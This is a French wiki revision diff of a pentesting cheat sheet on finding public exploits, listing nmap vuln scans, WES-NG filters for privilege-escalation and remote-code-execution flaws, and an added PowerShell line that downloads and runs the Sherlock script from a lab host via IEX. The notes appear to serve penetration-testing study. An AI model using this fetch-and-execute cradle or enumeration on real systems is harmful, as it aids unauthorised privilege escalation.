Outils d'utilisateurs

Outils du Site


trouver_des_exploits_publique

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

trouver_des_exploits_publique [2020/07/28 14:16]
M0N5T3R
trouver_des_exploits_publique [2020/08/10 20:14] (Version actuelle)
M0N5T3R
Ligne 29: Ligne 29:
   * Nmap vuln   * Nmap vuln
   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
 +
 +  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
 +  * -> https://github.com/rasta-mouse/Sherlock
 +  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
 +  * ->  attend quelque minutes
  
  
Ligne 41: Ligne 46:
  
   * Windows Exploit Suggester - Next Generation (WES-NG)   * Windows Exploit Suggester - Next Generation (WES-NG)
-  * -> git clone https://github.com/bitsadmin/wesng+  * -> git clone https://github.com/bitsadmin/wesng.git
   * -> python wes.py --update   * -> python wes.py --update
   * -> python wes.py sysinfoTarget.txt    * -> python wes.py sysinfoTarget.txt 
Ligne 50: Ligne 55:
   * -> wes.py systeminfo.txt - -impact "Remote Code Execution"    * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
   * -> wes.py systeminfo.txt -i "Remote Code Execution"   * -> wes.py systeminfo.txt -i "Remote Code Execution"
 +  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
   * Only show vulnerabilities of a certain severity   * Only show vulnerabilities of a certain severity
   * -> wes.py systeminfo.txt --severity critical important   * -> wes.py systeminfo.txt --severity critical important
trouver_des_exploits_publique.1595938570.txt.gz · Dernière modification: 2020/07/28 14:16 par M0N5T3R